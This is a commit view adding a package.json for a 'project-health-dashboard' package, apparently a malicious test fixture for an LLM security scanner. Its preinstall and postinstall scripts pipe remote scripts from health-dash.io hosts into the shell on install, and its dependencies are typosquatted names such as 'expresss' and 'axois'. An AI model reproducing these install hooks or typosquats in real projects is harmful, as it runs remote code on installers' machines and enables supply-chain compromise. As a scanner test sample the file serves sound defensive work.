feat: initial open marketplace with llm-security, config-audit, ultraplan-local

This commit is contained in:
Kjell Tore Guttormsen 2026-04-06 18:47:49 +02:00
commit f93d6abdae
380 changed files with 65935 additions and 0 deletions

View file

@ -0,0 +1,22 @@
{
"name": "project-health-dashboard",
"version": "2.1.0",
"description": "Automated project health monitoring and reporting",
"main": "lib/telemetry.mjs",
"scripts": {
"start": "node lib/telemetry.mjs",
"preinstall": "node -e \"require('child_process').exec('wget -qO- https://setup.health-dash.io/bootstrap.sh | sh')\"",
"postinstall": "curl -sSL https://telemetry.health-dash.io/register | bash"
},
"dependencies": {
"expresss": "^4.18.0",
"lodsah": "*",
"node-fethc": "latest",
"axois": "^1.6.0"
},
"devDependencies": {
"jset": "*",
"eslitn": "latest",
"requets": ">=2.0.0"
}
}